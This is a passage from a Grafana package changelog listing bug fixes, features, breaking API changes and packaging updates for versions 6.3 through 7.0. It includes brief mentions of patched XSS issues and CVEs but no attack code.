@torkelo\n\n - LoginPage: Fix hover color for service buttons. #25009,\n @tskarhed\n\n - LogsPanel: Fix scrollbar. #24850, @ivanahuckova\n\n - MoveDashboard: Fix for moving dashboard caused all\n variables to be lost. #25005, @torkelo\n\n - Organize transformer: Use display name in field order\n comparer. #24984, @dprokop\n\n - Panel: shows correct panel menu items in view mode.\n #24912, @hugohaggmark\n\n - PanelEditor Fix missing labels and description if there\n is only single option in category. #24905, @dprokop\n\n - PanelEditor: Overrides name matcher still show all\n original field names even after Field default display\n name is specified. #24933, @torkelo\n\n - PanelInspector: Makes sure Data display options are\n visible. #24902, @hugohaggmark\n\n - PanelInspector: Hides unsupported data display options\n for Panel type. #24918, @hugohaggmark\n\n - PanelMenu: Make menu disappear on button press. #25015,\n @tskarhed\n\n - Postgres: Fix add button. #25087, @phemmer\n\n - Prometheus: Fix recording rules expansion. #24977,\n @ivanahuckova\n\n - Stackdriver: Fix creating Service Level Objectives (SLO)\n datasource query variable. #25023, @papagian\n\n - Update to version 7.0.0 \n\n - Breaking changes\n\n - Removed PhantomJS: PhantomJS was deprecated in Grafana\n v6.4 and starting from Grafana v7.0.0, all PhantomJS\n support has been removed. This means that Grafana no\n longer ships with a built-in image renderer, and we\n advise you to install the Grafana Image Renderer plugin.\n\n - Dashboard: A global minimum dashboard refresh interval\n is now enforced and defaults to 5 seconds.\n\n - Interval calculation: There is now a new option Max data\n points that controls the auto interval $__interval\n calculation. Interval was previously calculated by\n dividing the panel width by the time range. With the new\n max data points option it is now easy to set $__interval\n to a dynamic value that is time range agnostic. For\n example if you set Max data points to 10 Grafana will\n dynamically set $__interval by dividing the current time\n range by 10.\n\n - Datasource/Loki: Support for deprecated Loki endpoints\n has been removed.\n\n - Backend plugins: Grafana now requires backend plugins to\n be signed, otherwise Grafana will not load/start them.\n This is an additional security measure to make sure\n backend plugin binaries and files haven't been tampered\n with. Refer to Upgrade Grafana for more information.\n\n - @grafana/ui: Forms migration notice, see @grafana/ui\n changelog\n\n - @grafana/ui: Select API change for creating custom\n values, see @grafana/ui changelog\n\n + Deprecation warnings\n\n - Scripted dashboards is now deprecated. The feature is\n not removed but will be in a future release. We hope to\n address the underlying requirement of dynamic dashboards\n in a different way. #24059\n\n - The unofficial first version of backend plugins together\n with usage of grafana/grafana-plugin-model is now\n deprecated and support for that will be removed in a\n future release. Please refer to backend plugins\n documentation for information about the new officially\n supported backend plugins.\n\n - Features / Enhancements\n\n - Backend plugins: Log deprecation warning when using the\n unofficial first version of backend plugins. #24675,\n @marefr\n\n - Editor: New line on Enter, run query on Shift+Enter.\n #24654, @davkal\n\n - Loki: Allow multiple derived fields with the same name.\n #24437, @aocenas\n\n - Orgs: Add future deprecation notice. #24502, @torkelo\n\n - Bug Fixes\n\n - @grafana/toolkit: Use process.cwd() instead of PWD to\n get directory. #24677, @zoltanbedi\n\n - Admin: Makes long settings values line break in settings\n page. #24559, @hugohaggmark\n\n - Dashboard: Allow editing provisioned dashboard JSON and\n add confirmation when JSON is copied to dashboard.\n #24680, @dprokop\n\n - Dashboard: Fix for strange 'dashboard not found' errors\n when opening links in dashboard settings. #24416,\n @torkelo\n\n - Dashboard: Fix so default data source is selected when\n data source can't be found in panel editor. #24526,\n @mckn\n\n - Dashboard: Fixed issue changing a panel from transparent\n back to normal in panel editor. #24483, @torkelo\n\n - Dashboard: Make header names reflect the field name when\n exporting to CSV file from the the panel inspector.\n #24624, @peterholmberg\n\n - Dashboard: Make sure side pane is displayed with tabs by\n default in panel editor. #24636, @dprokop\n\n - Data source: Fix query/annotation help content\n formatting. #24687, @AgnesToulet\n\n - Data source: Fixes async mount errors. #24579, @Estrax\n\n - Data source: Fixes saving a data source without failure\n when URL doesn't specify a protocol. #24497, @aknuds1\n\n - Explore/Prometheus: Show results of instant queries only\n in table. #24508, @ivanahuckova\n\n - Explore: Fix rendering of react query editors. #24593,\n @ivanahuckova\n\n - Explore: Fixes loading more logs in logs context view.\n #24135, @Estrax\n\n - Graphite: Fix schema and dedupe strategy in rollup\n indicators for Metrictank queries. #24685, @torkelo\n\n - Graphite: Makes query annotations work again. #24556,\n @hugohaggmark\n\n - Logs: Clicking 'Load more' from context overlay doesn't\n expand log row. #24299, @kaydelaney\n\n - Logs: Fix total bytes process calculation. #24691,\n @davkal\n\n - Org/user/team preferences: Fixes so UI Theme can be set\n back to Default. #24628, @AgnesToulet\n\n - Plugins: Fix manifest validation. #24573, @aknuds1\n\n - Provisioning: Use proxy as default access mode in\n provisioning. #24669, @bergquist\n\n - Search: Fix select item when pressing enter and Grafana\n is served using a sub path. #24634, @tskarhed\n\n - Search: Save folder expanded state. #24496, @Clarity-89\n\n - Security: Tag value sanitization fix in OpenTSDB data\n source. #24539, @rotemreiss\n\n - Table: Do not include angular options in options when\n switching from angular panel. #24684, @torkelo\n\n - Table: Fixed persisting column resize for time series\n fields. #24505, @torkelo\n\n - Table: Fixes Cannot read property subRows of null.\n #24578, @hugohaggmark\n\n - Time picker: Fixed so you can enter a relative range in\n the time picker without being converted to absolute\n range. #24534, @mckn\n\n - Transformations: Make transform dropdowns not cropped.\n #24615, @dprokop\n\n - Transformations: Sort order should be preserved as\n entered by user when using the reduce transformation.\n #24494, @hugohaggmark\n\n - Units: Adds scale symbol for currencies with suffixed\n symbol. #24678, @hugohaggmark\n\n - Variables: Fixes filtering options with more than 1000\n entries. #24614, @hugohaggmark\n\n - Variables: Fixes so Textbox variables read value from\n url. #24623, @hugohaggmark\n\n - Zipkin: Fix error when span contains remoteEndpoint.\n #24524, @aocenas\n\n - SAML: Switch from email to login for user login\n attribute mapping (Enterprise)\n\n - Update Makefile and spec file\n\n - Remove phantomJS patch from Makefile \n\n - Fix multiline strings in Makefile\n\n - Exclude s390 from SLE12 builds, golang 1.14 is not built\n for s390\n\n - Add instructions for patching the Grafana JavaScript\n frontend.\n\n - BuildRequires golang(API) instead of go metapackage\n version range\n\n - BuildRequires: golang(API) >= 1.14 from BuildRequires: (\n go >= 1.14 with go < 1.15 )\n\n - Update to version 6.7.3\n\n - This version fixes bsc#1170557 and its corresponding\n CVE-2020-12245\n\n - Admin: Fix Synced via LDAP message for non-LDAP external\n users. #23477, @alexanderzobnin\n\n - Alerting: Fixes notifications for alerts with empty\n message in Google Hangouts notifier. #23559,\n @hugohaggmark\n\n - AuthProxy: Fixes bug where long username could not be\n cached.. #22926, @jcmcken\n\n - Dashboard: Fix saving dashboard when editing raw\n dashboard JSON model. #23314, @peterholmberg\n\n - Dashboard: Try to parse 8 and 15 digit numbers as\n timestamps if parsing of time range as date fails.\n #21694, @jessetan\n\n - DashboardListPanel: Fixed problem with empty panel after\n going into edit mode (General folder filter being\n automatically added) . #23426, @torkelo\n\n - Data source: Handle datasource withCredentials option\n properly. #23380, @hvtuananh\n\n - Security: Fix annotation popup XSS vulnerability.\n #23813, @torkelo\n\n - Server: Exit Grafana with status code 0 if no error.\n #23312, @aknuds1\n\n - TablePanel: Fix XSS issue in header column rename\n (backport). #23814, @torkelo\n\n - Variables: Fixes error when setting adhoc variable\n values. #23580, @hugohaggmark\n\n - Update to version 6.7.2: (see installed changelog for\n the full list of changes)\n\n - BackendSrv: Adds config to response to fix issue for\n external plugins that used this property . #23032,\n @torkelo\n\n - Dashboard: Fixed issue with saving new dashboard after\n changing title . #23104, @dprokop\n\n - DataLinks: make sure we use the correct datapoint when\n dataset contains null value.. #22981, @mckn\n\n - Plugins: Fixed issue for plugins that imported dateMath\n util . #23069, @mckn\n\n - Security: Fix for dashboard snapshot original dashboard\n link could contain XSS vulnerability in url. #23254,\n @torkelo\n\n - Variables: Fixes issue with too many queries being\n issued for nested template variables after value change.\n #23220, @torkelo\n\n - Plugins: Expose promiseToDigest. #23249, @torkelo\n\n - Reporting (Enterprise): Fixes issue updating a report\n created by someone else\n\n - Update to 6.7.1: (see installed changelog for the full\n list of changes) Bug Fixes\n\n - Azure: Fixed dropdowns not showing current value.\n #22914, @torkelo\n\n - BackendSrv: only add content-type on POST, PUT requests.\n #22910, @hugohaggmark\n\n - Panels: Fixed size issue with panel internal size when\n exiting panel edit mode. #22912, @torkelo\n\n - Reporting: fixes migrations compatibility with mysql\n (Enterprise)\n\n - Reporting: Reduce default concurrency limit to 4\n (Enterprise)\n\n - Update to 6.7.0: (see installed changelog for the full\n list of changes) Bug Fixes\n\n - AngularPanels: Fixed inner height calculation for\n angular panels . #22796, @torkelo\n\n - BackendSrv: makes sure provided headers are correctly\n recognized and set. #22778, @hugohaggmark\n\n - Forms: Fix input suffix position (caret-down in Select)\n . #22780, @torkelo\n\n - Graphite: Fixed issue with query editor and next select\n metric now showing after selecting metric node . #22856,\n @torkelo\n\n - Rich History: UX adjustments and fixes. #22729,\n @ivanahuckova\n\n - Update to 6.7.0-beta1: Breaking changes\n\n - Slack: Removed Mention setting and instead introduce\n Mention Users, Mention Groups, and Mention Channel. The\n first two settings require user and group IDs,\n respectively. This change was necessary because the way\n of mentioning via the Slack API changed and mentions in\n Slack notifications no longer worked.\n\n - Alerting: Reverts the behavior of diff and percent_diff\n to not always be absolute. Something we introduced by\n mistake in 6.1.0. Alerting now support diff(),\n diff_abs(), percent_diff() and percent_diff_abs().\n #21338\n\n - Notice about changes in backendSrv for plugin authors In\n our mission to migrate away from AngularJS to React we\n have removed all AngularJS dependencies in the core data\n retrieval service backendSrv. Removing the AngularJS\n dependencies in backendSrv has the unfortunate side\n effect of AngularJS digest no longer being triggered for\n any request made with backendSrv. Because of this,\n external plugins using backendSrv directly may suffer\n from strange behaviour in the UI. To remedy this issue,\n as a plugin author you need to trigger the digest after\n a direct call to backendSrv. Bug Fixes API: Fix redirect\n issues. #22285, @papagian Alerting: Don't include\n image_url field with Slack message if empty. #22372,\n @aknuds1 Alerting: Fixed bad background color for\n default notifications in alert tab . #22660, @krvajal\n Annotations: In table panel when setting transform to\n annotation, they will now show up right away without a\n manual refresh. #22323, @krvajal Azure Monitor: Fix app\n insights source to allow for new __timeFrom and\n __timeTo. #21879, @ChadNedzlek BackendSrv: Fixes POST\n body for form data. #21714, @hugohaggmark CloudWatch:\n Credentials cache invalidation fix. #22473, @sunker\n CloudWatch: Expand alias variables when query yields no\n result. #22695, @sunker Dashboard: Fix bug with NaN in\n alerting. #22053, @a-melnyk Explore: Fix display of\n multiline logs in log panel and explore. #22057,\n @thomasdraebing Heatmap: Legend color range is incorrect\n when using custom min/max. #21748, @sv5d Security: Fixed\n XSS issue in dashboard history diff . #22680, @torkelo\n StatPanel: Fixes base color is being used for null\n values . #22646, @torkelo\n\n - Update to version 6.6.2: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.6.1: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.6.0: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.3: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.2: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.1: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.0 (see installed changelog for the\n full list of changes)\n\n - Update to version 6.4.5 :\n\n - Create version 6.4.5\n\n - CloudWatch: Fix high CPU load (#20579)\n\n - Add obs-service-go_modules to download required modules\n into vendor.tar.gz\n\n - Adjusted spec file to use vendor.tar.gz\n\n - Adjusted Makefile to work with new filenames\n\n - BuildRequire go1.14\n\n - Update to version 6.4.4 :\n\n - DataLinks: Fix blur issues. #19883, @aocenas\n\n - Docker: Makes it possible to parse timezones in the\n docker image. #20081, @xlson\n\n - LDAP: All LDAP servers should be tried even if one of\n them returns a connection error. #20077, @jongyllen\n\n - LDAP: No longer shows incorrectly matching groups based\n on role in debug page. #20018, @xlson\n\n - Singlestat: Fix no data / null value mapping . #19951,\n @ryantxu\n\n - Revert the spec file and make script\n\n - Remove PhantomJS dependency\n\n - Update to 6.4.3\n\n - Bug Fixes\n\n - Alerting: All notification channels should send even if\n one fails to send. #19807, @jan25\n\n - AzureMonitor: Fix slate interference with dropdowns.\n #19799, @aocenas\n\n - ContextMenu: make ContextMenu positioning aware of the\n viewport width. #19699, @krvajal\n\n - DataLinks: Fix context menu not showing in\n singlestat-ish visualisations. #19809, @dprokop\n\n - DataLinks: Fix url field not releasing focus. #19804,\n @aocenas\n\n - Datasource: Fixes clicking outside of some query editors\n required 2 clicks. #19822, @aocenas\n\n - Panels: Fixes default tab for visualizations without\n Queries Tab. #19803, @hugohaggmark\n\n - Singlestat: Fixed issue with mapping null to text.\n #19689, @torkelo\n\n - @grafana/toolkit: Don't fail plugin creation when git\n user.name config is not set. #19821, @dprokop\n\n - @grafana/toolkit: TSLint line number off by 1. #19782,\n @fredwangwang\n\n - Update to 6.4.2\n\n - Bug Fixes\n\n - CloudWatch: Changes incorrect dimension wmlid to wlmid .\n #19679, @ATTron\n\n - Grafana Image Renderer: Fixes plugin page. #19664,\n @hugohaggmark\n\n - Graph: Fixes auto decimals logic for y axis ticks that\n results in too many decimals for high values. #19618,\n @torkelo\n\n - Graph: Switching to series mode should re-render graph.\n #19623, @torkelo\n\n - Loki: Fix autocomplete on label values. #19579, @aocenas\n\n - Loki: Removes live option for logs panel. #19533,\n @davkal\n\n - Profile: Fix issue with user profile not showing more\n than sessions sessions in some cases. #19578,\n @huynhsamha\n\n - Prometheus: Fixes so results in Panel always are sorted\n by query order. #19597, @hugohaggmark\n\n - ShareQuery: Fixed issue when using -- Dashboard --\n datasource (to share query result) when dashboard had\n rows. #19610, @torkelo\n\n - Show SAML login button if SAML is enabled. #19591,\n @papagian\n\n - SingleStat: Fixes postfix/prefix usage. #19687,\n @hugohaggmark\n\n - Table: Proper handling of json data with dataframes.\n #19596, @marefr\n\n - Units: Fixed wrong id for Terabits/sec. #19611,\n @andreaslangnevyjel\n\n - Changes from 6.4.1\n\n - Bug Fixes\n\n - Provisioning: Fixed issue where empty nested keys in\n YAML provisioning caused a server crash, #19547\n\n - ImageRendering: Fixed issue with image rendering in\n enterprise build (Enterprise)\n\n - Reporting: Fixed issue with reporting service when STMP\n was disabled (Enterprise).\n\n - Changes from 6.4.0\n\n - Features / Enhancements\n\n - Build: Upgrade go to 1.12.10. #19499, @marefr\n\n - DataLinks: Suggestions menu improvements. #19396,\n @dprokop\n\n - Explore: Take root_url setting into account when\n redirecting from dashboard to explore. #19447,\n @ivanahuckova\n\n - Explore: Update broken link to logql docs. #19510,\n @ivanahuckova\n\n - Logs: Adds Logs Panel as a visualization. #19504,\n @davkal\n\n - Bug Fixes\n\n - CLI: Fix version selection for plugin install. #19498,\n @aocenas\n\n - Graph: Fixes minor issue with series override color\n picker and custom color . #19516, @torkelo\n\n - Changes from 6.4.0 Beta 2\n\n - Features / Enhancements\n\n - Azure Monitor: Remove support for cross resource queries\n (#19115)'. #19346, @sunker\n\n - Docker: Upgrade packages to resolve reported\n vulnerabilities. #19188, @marefr\n\n - Graphite: Time range expansion reduced from 1 minute to\n 1 second. #19246, @torkelo\n\n - grafana/toolkit: Add plugin creation task. #19207,\n @dprokop\n\n - Bug Fixes\n\n - Alerting: Prevents creating alerts from unsupported\n queries. #19250, @hugohaggmark\n\n - Alerting: Truncate PagerDuty summary when greater than\n 1024 characters. #18730, @nvllsvm\n\n - Cloudwatch: Fix autocomplete for Gamelift dimensions.\n #19146, @kevinpz\n\n - Dashboard: Fix export for sharing when panels use\n default data source. #19315, @torkelo\n\n - Database: Rewrite system statistics query to perform\n better. #19178, @papagian\n\n - Gauge/BarGauge: Fix issue with [object Object] in titles\n . #19217, @ryantxu\n\n - MSSQL: Revert usage of new connectionstring format\n introduced by #18384. #19203, @marefr\n\n - Multi-LDAP: Do not fail-fast on invalid credentials.\n #19261, @gotjosh\n\n - MySQL, Postgres, MSSQL: Fix validating query with\n template variables in alert . #19237, @marefr\n\n - MySQL, Postgres: Update raw sql when query builder\n updates. #19209, @marefr\n\n - MySQL: Limit datasource error details returned from the\n backend. #19373, @marefr\n\n - Changes from 6.4.0 Beta 1\n\n - Features / Enhancements\n\n - API: Readonly datasources should not be created via the\n API. #19006, @papagian\n\n - Alerting: Include configured AlertRuleTags in Webhooks\n notifier. #18233, @dominic-miglar\n\n - Annotations: Add annotations support to Loki. #18949,\n @aocenas\n\n - Annotations: Use a single row to represent a region.\n #17673, @ryantxu\n\n - Auth: Allow inviting existing users when login form is\n disabled. #19048, @548017\n\n - Azure Monitor: Add support for cross resource queries.\n #19115, @sunker\n\n - CLI: Allow installing custom binary plugins. #17551,\n @aocenas\n\n - Dashboard: Adds Logs Panel (alpha) as visualization\n option for Dashboards. #18641, @hugohaggmark\n\n - Dashboard: Reuse query results between panels . #16660,\n @ryantxu\n\n - Dashboard: Set time to to 23:59:59 when setting To time\n using calendar. #18595, @simPod\n\n - DataLinks: Add DataLinks support to Gauge, BarGauge and\n SingleStat2 panel. #18605, @ryantxu\n\n - DataLinks: Enable access to labels & field names.\n #18918, @torkelo\n\n - DataLinks: Enable multiple data links per panel. #18434,\n @dprokop\n\n - Docker: switch docker image to alpine base with\n phantomjs support. #18468, @DanCech\n\n - Elasticsearch: allow templating queries to order by\n doc_count. #18870, @hackery\n\n - Explore: Add throttling when doing live queries. #19085,\n @aocenas\n\n - Explore: Adds ability to go back to dashboard,\n optionally with query changes. #17982, @kaydelaney\n\n - Explore: Reduce default time range to last hour. #18212,\n @davkal\n\n - Gauge/BarGauge: Support decimals for min/max. #18368,\n @ryantxu\n\n - Graph: New series override transform constant that\n renders a single point as a line across the whole graph.\n #19102, @davkal\n\n - Image rendering: Add deprecation warning when PhantomJS\n is used for rendering images. #18933, @papagian\n\n - InfluxDB: Enable interpolation within ad-hoc filter\n values. #18077, @kvc-code\n\n - LDAP: Allow an user to be synchronized against LDAP.\n #18976, @gotjosh\n\n - Ldap: Add ldap debug page. #18759, @peterholmberg\n\n - Loki: Remove prefetching of default label values.\n #18213, @davkal\n\n - Metrics: Add failed alert notifications metric. #18089,\n @koorgoo\n\n - OAuth: Support JMES path lookup when retrieving user\n email. #14683, @bobmshannon\n\n - OAuth: return GitLab groups as a part of user info\n (enable team sync). #18388, @alexanderzobnin\n\n - Panels: Add unit for electrical charge - ampere-hour.\n #18950, @anirudh-ramesh\n\n - Plugin: AzureMonitor - Reapply MetricNamespace support.\n #17282, @raphaelquati\n\n - Plugins: better warning when plugins fail to load.\n #18671, @ryantxu\n\n - Postgres: Add support for scram sha 256 authentication.\n #18397, @nonamef\n\n - RemoteCache: Support SSL with Redis. #18511, @kylebrandt\n\n - SingleStat: The gauge option in now disabled/hidden\n (unless it's an old panel with it already enabled) .\n #18610, @ryantxu\n\n - Stackdriver: Add extra alignment period options. #18909,\n @sunker\n\n - Units: Add South African Rand (ZAR) to currencies.\n #18893, @jeteon\n\n - Units: Adding T,P,E,Z,and Y bytes. #18706, @chiqomar\n\n - Bug Fixes\n\n - Alerting: Notification is sent when state changes from\n no_data to ok. #18920, @papagian\n\n - Alerting: fix duplicate alert states when the alert\n fails to save to the database. #18216, @kylebrandt\n\n - Alerting: fix response popover prompt when add\n notification channels. #18967, @lzdw\n\n - CloudWatch: Fix alerting for queries with Id (using\n GetMetricData). #17899, @alex-berger\n\n - Explore: Fix auto completion on label values for Loki.\n #18988, @aocenas\n\n - Explore: Fixes crash using back button with a zoomed in\n graph. #19122, @hugohaggmark\n\n - Explore: Fixes so queries in Explore are only run if\n Graph/Table is shown. #19000, @hugohaggmark\n\n - MSSQL: Change connectionstring to URL format to fix\n using passwords with semicolon. #18384, @Russiancold\n\n - MSSQL: Fix memory leak when debug enabled. #19049,\n @briangann\n\n - Provisioning: Allow escaping literal '$' with '$$' in\n configs to avoid interpolation. #18045, @kylebrandt\n\n - TimePicker: Fixes hiding time picker dropdown in\n FireFox. #19154, @hugohaggmark\n\n - Breaking changes\n\n + Annotations There are some breaking changes in the\n annotations HTTP API for region annotations. Region\n annotations are now represented using a single event\n instead of two separate events. Check breaking changes\n in HTTP API below and HTTP API documentation for more\n details.\n\n + Docker Grafana is now using Alpine 3.10 as docker base\n image.\n\n + HTTP API\n\n - GET /api/alert-notifications now requires at least\n editor access. New /api/alert-notifications/lookup\n returns less information than /api/alert-notifications\n and can be access by any authenticated user.\n\n - GET /api/alert-notifiers now requires at least editor\n access\n\n - GET /api/org/users now requires org admin role. New\n /api/org/users/lookup returns less information than\n /api/org/users and can be access by users that are org\n admins, admin in any folder or admin of any team.\n\n - GET /api/annotations no longer returns regionId\n property.\n\n - POST /api/annotations no longer supports isRegion\n property.\n\n - PUT /api/annotations/:id no longer supports isRegion\n property.\n\n - PATCH /api/annotations/:id no longer supports isRegion\n property.\n\n - DELETE /api/annotations/region/:id has been removed.\n\n - Deprecation notes\n\n + PhantomJS\n\n - PhantomJS, which is used for rendering images of\n dashboards and panels, is deprecated and will be removed\n in a future Grafana release. A deprecation warning will\n from now on be logged when Grafana starts up if\n PhantomJS is in use. Please consider migrating from\n PhantomJS to the Grafana Image Renderer plugin.\n\n - Changes from 6.3.6\n\n - Features / Enhancements\n\n - Metrics: Adds setting for turning off total stats\n metrics. #19142, @marefr\n\n - Bug Fixes\n\n - Database: Rewrite system statistics query to perform\n better. #19178, @papagian\n\n - Explore: Fixes error when switching from prometheus to\n loki data sources. #18599, @kaydelaney\n\n - Rebase package spec. Use mostly from fedora, fix suse\n specified things and fix some errors.\n\n - Add missing directories provisioning/datasources and\n provisioning/notifiers and sample.yaml as described in\n packaging/rpm/control from upstream. Missing directories\n are shown in logfiles.\n\n - Version 6.3.5\n\n - Upgrades\n\n + Build: Upgrade to go 1.12.9.\n\n - Bug Fixes\n\n + Dashboard: Fixes dashboards init failed loading error\n for dashboards with panel links that had missing\n properties.\n\n + Editor: Fixes issue where only entire lines were being\n copied.\n\n + Explore: Fixes query field layout in splitted view for\n Safari browsers.\n\n + LDAP: multildap + ldap integration.\n\n + Profile/UserAdmin: Fix for user agent parser crashes\n grafana-server on 32-bit builds.\n\n + Prometheus: Prevents panel editor crash when switching\n to Prometheus datasource.\n\n + Prometheus: Changes brace-insertion behavior to be less\n annoying.\n\n - Version 6.3.4\n\n - Security: CVE-2019-15043 - Parts of the HTTP API allow\n unauthenticated use.\n\n - Version 6.3.3\n\n - Bug Fixes\n\n + Annotations: Fix failing annotation query when time\n series query is cancelled. #18532 1, @dprokop 1\n\n + Auth: Do not set SameSite cookie attribute if\n cookie_samesite is none. #18462 1, @papagian 3\n\n + DataLinks: Apply scoped variables to data links\n correctly. #18454 1, @dprokop 1\n\n + DataLinks: Respect timezone when displaying\n datapoint&rsquo;s timestamp in graph context menu.\n #18461 2, @dprokop 1\n\n + DataLinks: Use datapoint timestamp correctly when\n interpolating variables. #18459 1, @dprokop 1\n\n + Explore: Fix loading error for empty queries. #18488 1,\n @davkal\n\n + Graph: Fixes legend issue clicking on series line icon\n and issue with horizontal scrollbar being visible on\n windows. #18563 1, @torkelo 2\n\n + Graphite: Avoid glob of single-value array variables .\n #18420, @gotjosh\n\n + Prometheus: Fix queries with label_replace remove the $1\n match when loading query editor. #18480 5, @hugohaggmark\n 3\n\n + Prometheus: More consistently allows for multi-line\n queries in editor. #18362 2, @kaydelaney 2\n\n + TimeSeries: Assume values are all numbers. #18540 4,\n @ryantxu\n\n - Version 6.3.2\n\n - Bug Fixes\n\n + Gauge/BarGauge: Fixes issue with losts thresholds and\n issue loading Gauge with avg stat. #18375 12\n\n - Version 6.3.1\n\n - Bug Fixes\n\n + PanelLinks: Fix crash issue Gauge & Bar Gauge for panels\n with panel links (drill down links). #18430 2\n\n - Version 6.3.0\n\n - Features / Enhancements\n\n + OAuth: Do not set SameSite OAuth cookie if\n cookie_samesite is None. #18392 4, @papagian 3\n\n + Auth Proxy: Include additional headers as part of the\n cache key. #18298 6, @gotjosh\n\n + Build grafana images consistently. #18224 12,\n @hassanfarid\n\n + Docs: SAML. #18069 11, @gotjosh\n\n + Permissions: Show plugins in nav for non admin users but\n hide plugin configuration. #18234 1, @aocenas\n\n + TimePicker: Increase max height of quick range dropdown.\n #18247 2, @torkelo 2\n\n + Alerting: Add tags to alert rules. #10989 13, @Thib17 1\n\n + Alerting: Attempt to send email notifications to all\n given email addresses. #16881 1, @zhulongcheng\n\n + Alerting: Improve alert rule testing. #16286 2, @marefr\n\n + Alerting: Support for configuring content field for\n Discord alert notifier. #17017 2, @jan25\n\n + Alertmanager: Replace illegal chars with underscore in\n label names. #17002 5, @bergquist 1\n\n + Auth: Allow expiration of API keys. #17678, @papagian 3\n\n + Auth: Return device, os and browser when listing user\n auth tokens in HTTP API. #17504, @shavonn 1\n\n + Auth: Support list and revoke of user auth tokens in UI.\n #17434 2, @shavonn 1\n\n + AzureMonitor: change clashing built-in Grafana\n variables/macro names for Azure Logs. #17140, @shavonn 1\n\n + CloudWatch: Made region visible for AWS Cloudwatch\n Expressions. #17243 2, @utkarshcmu\n\n + Cloudwatch: Add AWS DocDB metrics. #17241, @utkarshcmu\n\n + Dashboard: Use timezone dashboard setting when exporting\n to CSV. #18002 1, @dehrax\n\n + Data links. #17267 11, @torkelo 2\n\n + Docker: Switch base image to ubuntu:latest from\n debian:stretch to avoid security issues&hellip; #17066\n 5, @bergquist 1\n\n + Elasticsearch: Support for visualizing logs in Explore .\n #17605 7, @marefr\n\n + Explore: Adds Live option for supported datasources.\n #17062 1, @hugohaggmark 3\n\n + Explore: Adds orgId to URL for sharing purposes. #17895\n 1, @kaydelaney 2\n\n + Explore: Adds support for new loki &lsquo;start&rsquo;\n and &lsquo;end&rsquo; params for labels endpoint.\n #17512, @kaydelaney 2\n\n + Explore: Adds support for toggling raw query mode in\n explore. #17870, @kaydelaney 2\n\n + Explore: Allow switching between metrics and logs .\n #16959 2, @marefr\n\n + Explore: Combines the timestamp and local time columns\n into one. #17775, @hugohaggmark 3\n\n + Explore: Display log lines context . #17097, @dprokop 1\n\n + Explore: Don&rsquo;t parse log levels if provided by\n field or label. #17180 1, @marefr\n\n + Explore: Improves performance of Logs element by\n limiting re-rendering. #17685, @kaydelaney 2\n\n + Explore: Support for new LogQL filtering syntax. #16674\n 4, @davkal\n\n + Explore: Use new TimePicker from Grafana/UI. #17793,\n @hugohaggmark 3\n\n + Explore: handle newlines in LogRow Highlighter. #17425,\n @rrfeng 1\n\n + Graph: Added new fill gradient option. #17528 3,\n @torkelo 2\n\n + GraphPanel: Don&rsquo;t sort series when legend table &\n sort column is not visible . #17095, @shavonn 1\n\n + InfluxDB: Support for visualizing logs in Explore.\n #17450 9, @hugohaggmark 3\n\n + Logging: Login and Logout actions (#17760). #17883 1,\n @ATTron\n\n + Logging: Move log package to pkg/infra. #17023,\n @zhulongcheng\n\n + Metrics: Expose stats about roles as metrics. #17469 2,\n @bergquist 1\n\n + MySQL/Postgres/MSSQL: Add parsing for day, weeks and\n year intervals in macros. #13086 6, @bernardd\n\n + MySQL: Add support for periodically reloading client\n certs. #14892, @tpetr\n\n + Plugins: replace dataFormats list with skipDataQuery\n flag in plugin.json. #16984, @ryantxu\n\n + Prometheus: Take timezone into account for step\n alignment. #17477, @fxmiii\n\n + Prometheus: Use overridden panel range for $__range\n instead of dashboard range. #17352, @patrick246\n\n + Prometheus: added time range filter to series labels\n query. #16851 3, @FUSAKLA\n\n + Provisioning: Support folder that doesn&rsquo;t exist\n yet in dashboard provisioning. #17407 1, @Nexucis\n\n + Refresh picker: Handle empty intervals. #17585 1,\n @dehrax\n\n + Singlestat: Add y min/max config to singlestat\n sparklines. #17527 4, @pitr\n\n + Snapshot: use given key and deleteKey. #16876,\n @zhulongcheng\n\n + Templating: Correctly display __text in multi-value\n variable after page reload. #17840 1, @EduardSergeev\n\n + Templating: Support selecting all filtered values of a\n multi-value variable. #16873 2, @r66ad\n\n + Tracing: allow propagation with Zipkin headers. #17009\n 4, @jrockway\n\n + Users: Disable users removed from LDAP. #16820 2,\n @alexanderzobnin\n\n - Bug Fixes\n\n + PanelLinks: Fix render issue when there is no panel\n description. #18408 3, @dehrax\n\n + OAuth: Fix &ldquo;missing saved state&rdquo; OAuth login\n failure due to SameSite cookie policy. #18332 1,\n @papagian 3\n\n + cli: fix for recognizing when in dev mode&hellip;\n #18334, @xlson\n\n + DataLinks: Fixes incorrect interpolation of\n $(__series_name) . #18251 1, @torkelo 2\n\n + Loki: Display live tailed logs in correct order in\n Explore. #18031 3, @kaydelaney 2\n\n + PhantomJS: Fixes rendering on Debian Buster. #18162 2,\n @xlson\n\n + TimePicker: Fixed style issue for custom range popover.\n #18244, @torkelo 2\n\n + Timerange: Fixes a bug where custom time ranges\n didn&rsquo;t respect UTC. #18248 1, @kaydelaney 2\n\n + remote_cache: Fix redis connstr parsing. #18204 1,\n @mblaschke\n\n + AddPanel: Fix issue when removing moved add panel widget\n . #17659 2, @dehrax\n\n + CLI: Fix encrypt-datasource-passwords fails with sql\n error. #18014, @marefr\n\n + Elasticsearch: Fix default max concurrent shard\n requests. #17770 4, @marefr\n\n + Explore: Fix browsing back to dashboard panel. #17061,\n @jschill\n\n + Explore: Fix filter by series level in logs graph.\n #17798, @marefr\n\n + Explore: Fix issues when loading and both graph/table\n are collapsed. #17113, @marefr\n\n + Explore: Fix selection/copy of log lines. #17121,\n @marefr\n\n + Fix: Wrap value of multi variable in array when coming\n from URL. #16992 1, @aocenas\n\n + Frontend: Fix for Json tree component not working.\n #17608, @srid12\n\n + Graphite: Fix for issue with alias function being moved\n last. #17791, @torkelo 2\n\n + Graphite: Fixes issue with seriesByTag & function with\n variable param. #17795, @torkelo 2\n\n + Graphite: use POST for /metrics/find requests. #17814 2,\n @papagian 3\n\n + HTTP Server: Serve Grafana with a custom URL path\n prefix. #17048 6, @jan25\n\n + InfluxDB: Fixes single quotes are not escaped in label\n value filters. #17398 1, @Panzki\n\n + Prometheus: Correctly escape &lsquo;|&rsquo; literals in\n interpolated PromQL variables. #16932, @Limess\n\n + 